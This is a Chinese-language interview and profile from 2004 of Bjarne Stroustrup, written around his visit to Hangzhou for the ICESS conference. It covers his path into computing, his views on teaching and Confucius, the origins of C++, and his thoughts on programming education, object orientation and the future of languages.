Bjarne两度亲密接触中国，第一次是2002年，曾在中国的几所大学讲学，而第二次是在浙江大学参加ICESS国际会议（ICESS 2004, http://www.cs.zju.edu.cn/icess2004/）。Bjarne Stroustrup先生两年前在中国有过长时间的旅程，而在杭城的日子恰逢阴雨，这次到来对晴天的期望是强烈的，何况有杭州西湖美景。作为丹麦人，也就是卖火柴的小女孩诞生的地方，也就是安徒生童话诞生的国度，和中国有着很深的渊源，安徒生童话里恰巧里面有一篇《夜莺》，那里写到了中国，而Bjarne Stroustrup先生对于C（中国）的认识又是什么呢?

他的回答很微妙，他自然知道安徒生童话，他也很喜欢它们，《夜莺》中描绘的中国纯是虚构，与当时的中国可能有也可能没有任何关系，安徒生创造了那个“中国”来泛指多个国家及其统治者。而作为一个教育者，他对中国的教育老祖师孔老夫子也有自己独到的见解。

作为第二个C，自然就是C++了。勿庸置疑，C++对于IT的分量，和对于Bjarne个人的影响，都是巨大的。还有一个C，就是计算机，且看下面他如何描述自己与计算机的联系。

问： 您的生活是怎样和计算机联系在一起的？

Bjarne Stroustrup：我也不晓得自己到底是怎样和计算机联系在一起的。当我上高中时，不知什么原因总觉得计算机科学是数学的某种实用形式。而事实不完全是这样，或者至少从软件的发展上看并不是如此，但正是这种误解使得我在还不知计算机为何物时选择了 “计算机科学数学” ，作为我学习的专业，并获得了我的硕士学位。我写完第一个程序后，就着了迷，曾没有回过头。正象大家所看到的，很幸运，我找到了一个使自己的才能可以很好地发挥的位子。

问：您怎样教育自己的孩子和学生们？您对孔夫子有什么看法？孔子是中国古代的伟大教育家。

BS：多数情况下，我是通过实例来进行教学的。我认为多数人过高的估计了言语的影响力，而过低的估计了这种影响力是怎样达到的过程。我尽量通过把理论和实践相结合起来以更好地达到目的，这样可以比仅用理论或仅用实践示例来教育更能取得事半功倍的成效。我尽量举出实例，从这些活生生的实例中引导归纳出一般的规则和概念。

关于孔子的问题，到目前为止是你问的最棘手的问题。自然，我不是一个孔子问题专家，但是我曾经访问过中国并且我比其它西方非孔子研究者读过更多的关于中国历史的书，但事实上关于孔子的影响力，人们对他有不同看法，他的教育我也知之甚少。当然，我最喜欢他的“人合”的观念，但是就我个人的感觉而言，他的观点有点僵化呆板，权威化，太过于等级化，并且太注重传统的形式，同时他还强调建立一个有秩序的国家，这很容易把人仅仅按照事先定好的地位来对待，并且把个人仅仅看作他的性别，年龄，和等级等的一个代表。这有很大的局限性，我还认为和我的注重实例，实验的，和科学的教学观念相比他过分的强调道德，书本的学习和对人的控制。我希望我的这种评价不会对孔夫子不公。如果你认为我误解了他，请不要太介意，这种曲解更大程度上是无知而不是恶意造成的。当然孔子的思想也是可以理解的，毕竟2500年以前没有人对经验，技能和科学象今天的人理解的这样清楚，因此他们注重道德，统治和社会机制。

我不知这些观念被译成汉语会被怎么看待，但是我更注重个性化和实效的方法，但也不是所谓的忘我或者不负责任，每个人都应该尽力为他的家庭、国家和整个世界争取福利而不是从中索取，我们应该在我们离开世界时感到比我们以前看到的更好。

 

 

C++是怎样炼成的，是什么促成了C++语言？这象迷一样绕在我们的心头；那什么又是计算机语言呢？后者弄懂了，前者看起来也许就更简单了！且看大师的回答：

问： 您觉得计算机语言和我们人类的语言有什么不同呢？

Bjarne Stroustrup：计算机语言要比人类语言简单的多，并且精确的多，那也是它应该具有的方式。我不赞成用自然语言去指令电脑的想法。一种程序语言是专家们的工具，并且和普通人相比，是对所有的专家来说用更加专业、定义的更加精确的符号和术语来表达的工具。

当然两者也有相同之处。那些用的较多的语言比那些使用率较小的语言拥有更多的俗语、表达方式、词汇，这一点无论是计算机语言还是自然语言都是一样的。语言还有一个倾向就是越来越易学，但却很难精通，象Ｃ++和英语。在两种语言当中，我们都希望能从最初的基本的应用到真正的掌握。另外一个相同之处就是语言的发展都要适应一个群体的需求，并且一个大的群体或者说社区本身就有重要意义，因为作为这个群体的一部分可以让你有更多的人来进行互动并且有更多的机会可以使用。所有鲜活的语言都是通过获得新的术语、俗语和表达方式来得到发展的。在C++中我们已经看到了关于模板技术的迅猛发展，始因是STL（注：STL指标准模板库，后面我们将采访STL之父Stepanov先生，他确实有许多精彩的言论，和Bjarne Stroustrup先生相比，毫不逊色），也就是经常提到的泛型编程（generic programming）和模板元程序（template metaprogramming）。以后几年里，我们将会在新的ISO C++标准中看到，比1998年标准中对模板技术更强的支持和更广的应用。

 

那么，究竟是什么促成了C++语言呢？

他的研究生涯给了他很大灵感，他所在的AT&T贝尔实验室是一个光荣的群体，那里有一群非常出色的研究人员，那里有许多著名的IT人物，他们彼此间的影响十分深远。他曾经和C语言之父Dennis Ritchie亲密接触十多年，他们的办公室相距不远，C++语言受C的影响是巨大的。而对于C++来说，尤其值得我们推崇的是：作为一种学术性语言，他是从商业性语言的重围中杀出的。

1979年Bjarne在剑桥完成学业后，到了贝尔实验室从事研究工作，20世纪80年代，AT&T曾拔款5000美元作为市场预算，创建一门语言的决心可能由此而始。在那里，开始研究几个与分布式计算有关的项目。可是工作进展得并不顺利，因为那时几乎所有程序设计工具都不适合完成此类工作。所以，他决定自己开发一个名为“带类的C”的工具，它既允许以类似于Simula的方式组织程序（这种方式现在被称为面向对象），同时也支持在硬件层次上进行系统软件开发。从1980年开始，“带类的C”被应用于贝尔实验室的很多应用领域，在应用过程中，他又学到了很多东西，而C++正是以“带类的C”为基础并结合了一些我们学到的新东西发展而来的。1983年夏天，Rick Mascitti给起了C++的名字，这个名字也象征着两种语言之间巨大的渊源。

 

 

生活中更有意义的事情

对于Bjarne来说，生活中更有意义的事情是什么呢？是学习和教育。这看起来象个沉重的话题，而在Bjarne身上却显得如此生动，作为教育家，Bjarne Stroustrup先生本身便是一个成才的典范，他出身于农场和“蓝领工人”家庭，他在专业领域孜孜耕耘，取得了不菲业绩。先是AT&T的研究者，现在又兼任教席，Bjarne从研究室又走进了大学，直接面对大学的新学生！

C++是Bjarne生命中最重要的事情，而还有一些更有意义的事情。

他对大学教育情有独衷，他现在是A&M大学的教授，这种行动便是很好的说明，在这里，以一种在AT&T研究所中无法采用的方式将研究和教学结合起来。他认为教学是一种与工业生产不同的能影响世界并使其变得更加美好的方式，而且大学里的研究工作的成果与曾经进行的工业研究的并不相同 - 不是说它更好，仅仅只是不同而已。

他的一些教育观点也非常值得我们深思：

他说，不要只学习计算机和编程，要积累一种或多种领域的经验，要有其他专业知识，这样就能明白什么东西值得我们去编程实现。另外，学习多种语言也是他一再强调的，如果只学一种，容易导致想象力的僵化。他本人爱好广范，精通多种计算机语言。

图  摄影者的风景

 

问：您觉得怎样才是学编程的好方法？学习语言时一种好的工具是不是必需的？

Bjarne Stroustrup： 这是过去一年左右里一直占据我大部分注意力的一个问题。我志愿教授电子工程/计算机工程专业大学一年级的学生编程，我认为我们目前教编程的传统方法不够严谨也不够广阔。我们社会的文明进步是建立在软件上的，因而必须培养更好的软件专家。我认为已经到了我开始培养新手程序员的时候了，在我此之前我都是把精力放在专家上。我基本的设想是让学生成为专家，使他们最终能够编出可靠并且别人可以信赖的软件，这就意味着在培养新手时要求更高，要将重点放在对程序正确性和处理错误的训练上。既然目标是为了制造现实世界中可用的软件，我也非常重视标准库的应用和设计。对于C++标准库工具的教学，例如向量（vector）和字符(string)从第一周就该开始应用，在第一个月之内类（class）就应该介绍，在第二个月之内介绍图形（graphics）和继承性（inheritance）。这种方法和传统的方法不同，那些教学方法往往花费数周的时间来区分那些令人迷惑的C++基本类型，并且浪费宝贵的时间来处理诸如声明和循环上的一些迷人耳目的语法细节。我称我的方法为“深度优先法”，因为我们首先教我们的学生足够的知识去做一些有用的工作，然后才在这有限的基础上拓宽他们的理解能力和对工具的使用能力。

我所有的教学都是在实例的基础上进行的。我通过典型的例子来使学生理解，用亲身的体会来解释一些规则。自然地，我要求学生写大量代码—如果你不读也不写大量代码的话你就学不会编程。第一阶段如下，学生必须经过亲身写代码，体会解题过程中出现的实际问题；第二个阶段必须好好体会亲身所犯的错误，并且学会克服他们。这其中，调试、错误处理，还有学会将大问题分解成小问题，从最小的组件来编程是非常重要的。

 

问:数学和计算机科学有什么关系吗？

Bjarne Stroustrup： 两者并没有很强的直接联系，但是有一部分编程的实质包含在里面---象学数学一样，编程有时也需要很严密的思维。自从古希腊以来，数学就被用来训练人们的逻辑思维，并且我觉得如果不用数学的话很难想象怎样才能编出好程序来。当然也有一些计算机领域，用到高深的数学知识。然而，这些领域通常是非常专业的。数学，特别是数学思维是计算机的一个支柱。经验主义是另一支柱，通过观察和测量来帮助理解实际的发展，用以调整我们的系统和行为。两方面我们都需要。计算机科学不是仅仅用来证明定理的，也不是仅仅用来收集数据的。为了有效地实践计算机科学和发展高质量软件，更同时需要数学和经验的训练。

问： 您以前在欧洲学习而现在在美国工作，您觉得欧美有什么学术传统区别？怎样才算是一种好的大学教育呢？尤其对计算机科学来说。现在的大学有部分学生中途退学，您怎样看待这一现象呢？

Bjarne Stroustrup：这很难回答。欧洲和美国都幅员辽阔，而且有很多不同的学术传统。真的不好总结，并且在两地都有一些非常好的大学科系，这不是很容易区别和下结论的。

很少有学生离开学校去开公司，较多的是离开学校去从事一些有较高收入的工作，但大多数人还是完成了学业。我印象中那些放弃了计算机科学学习转而投入业界工作的是会为此感到后悔的。从长期眼光来看学位对一个好工作来说是重要的，特别是学生在他们最后一年或最后几年的学习。当然也确实有些相反的例子，但那些人通常永远不会再从事真正的技术工作，而转为商业管理人员了，如果那是他们想做的，那一个学位并不是必须的。我一直认为:一个学生如果还未获得学位，最好不要离开学校。

问：我们经常批评我们现在的C++教育不够现代、不够科学，您是通过“深度优先法”来教授学生的，您是否觉得在一个学生学习早期有些难吗？我们该如何做呢？

Bjarne Stroustrup：这是必然的。传统的教授编程的方法是不行的，学完这些课程的学生写不出很好的代码。说得更激进一点，他们甚至不知道什么是好的代码！我的方法可以避免这种情况发生。我已在300名学生身上实验成功。对于程序员来说这是非常关键的——包括新程序员——了解基本概念和基本技能。但仅仅了解程序设计语言的基本构造是不够的。另一方面，如果没有一种编程语言我们就不可能教授编程的技能和规则，因此，对一种语言工具充分掌握，做尽可能多的练习是必需的。

很显然，这种教育问题不仅仅局限于C++语言。我的方法可以应用于任何其他语言。

 

面向金钱、面向未来和面向对象

面向对象是个有趣的问题，C++正是和面向对象有着非常联系的语言，作为一种非商业化语言，他已经影响了世界范围数十亿美元的设计决策。而还有许多语言具有这种特点,因而，关于各种语言的争论喋喋不休地进行了几十年。

当有人问Bjarne Stroustrup先生：有人说Java是纯粹面向对象的，而C#更胜一筹，而还有很多人说它们纯粹是面向金钱的。以您之见呢？

Bjarne的回答非常风趣：我喜欢“面向金钱”这个词 :-) 还有Andrew Koenig的说法"面向大话"我也喜欢。C++可不面向这两个东东。对这点我还想指出，我认为纯粹性并非什么优点。C++的优点恰恰在于其支持多种有效的编程风格（多种思维模型吧，如果你一定要这么说）及其组合。最优雅最有效也最容易维护的解决方案常常涉及到一种以上的风格（编程模型）。如果一定要用吸引人的字眼，C++是一种多思维模型的语言。在软件开发的庞大领域，需求千变万化，起码需要一种支持多种编程的设计风格的通用语言，而且很可能需要一种以上呢。再说，世界之大，总容得下好几种编程语言吧？那种认为一种语言对所有应用和每个程序员都是最好的看法，根本就是荒谬的。

他上面的回答很好地告诉了我们面向对象和面向金钱的关系，也给我们的争论划上了圆满的句号。

问：您对面向对象是怎样理解的？它是不是一种好的可接受的编程思考方式？有没有学习OO必须的有用的工具？

Bjarne Stroustrup：OO技术在现在软件发展的扮演了非常重要的角色，但并不是唯一的方法。象泛型程序设计（generic programming）,用C++ 模板是另一种方法，这些方法必须通过综合应用来，才能创造出：一流的、最可读的、最易于维护的、最高效的程序。但没有任何一种方法是适合所有要求的。

我主要用C++来编程。我觉得C++是一种学习和实践OO思想很好的编程语言。

图 敢问路在何方

问： 您能对IT的将来做一下预测吗？将来我们最有可能用什么语言？

Bjarne Stroustrup：一个聪慧的幽默大师曾经说过：预测是困难的，特别是对将来的预测。但是我认为未来十年之内我们用的东西在今天的实验室里是能够看到的。另外我们将用的最主要的语言也是今天最主要的。我们不可能因为一些新东西和一些更好的东西的出现就重组整个工业领域，因此在五到十年之内，我们还是用C, C++, COBOL, Fortran, Java, Perl, Python，也许还有C#，和其它许多种语言。没有一种语言能适合所有用途，并且好的程序员都懂并且都能用好几种语言。懂好多种语言和多种程序设计技术会使我们可以更好地编程。

对于IT我不想说太多，很显然：我们会继续依赖IT并且它会延伸到越来越多的领域。当然，肯定会有失败，通常是因为过度的滥用引起的——但是在十年以后我们受IT的影响肯定要比今天大得多。

 

 

 

人物印象

图：作者和Bjarne Stroustrup先生合影

 

很幸运，通过电邮采访的同时终于有机会和大师面对面。想象中的大师和面对面见到的有太多的意想不到，用一个词来形容是“谦逊”。

Bjarne到杭州下了飞机，便扑向美丽的西湖，同去的是他的好友STL之父Alex Stepanov先生。在未去杭州之前，Bjarne Stroustrup先生通过电邮告诉我杭州城的美；去了之后，少有的好天气让我们碰上了，爽；夜里在旅馆见到了久违的大师，一夜之间见到两位大师，更爽！

我对Bjarne Stroustrup先生有着特殊的感情，觉得他象位慈父，而他正和我的父亲同样的年纪。大师，慈父！接触越多，对Bjarne Stroustrup先生的感触越深。到了杭城，见到大师其人，这种感觉越来越浓厚，他又象海，既有热情，又能包容。

采访大部是通过E—mail进行的，采访的过程中对我的问题孜孜以求，给我的回答细微备至，E—mail的好处在此发挥到了极致，大洋这边的我沐着阳光，那边的他在挑灯夜书。

唯有谢谢众多C++程友和非C++朋友对我的支持，唯有大师再来杭城时，到最好的茶馆将上好的龙井泡上，亲手送到大师的手中！

2004年12月19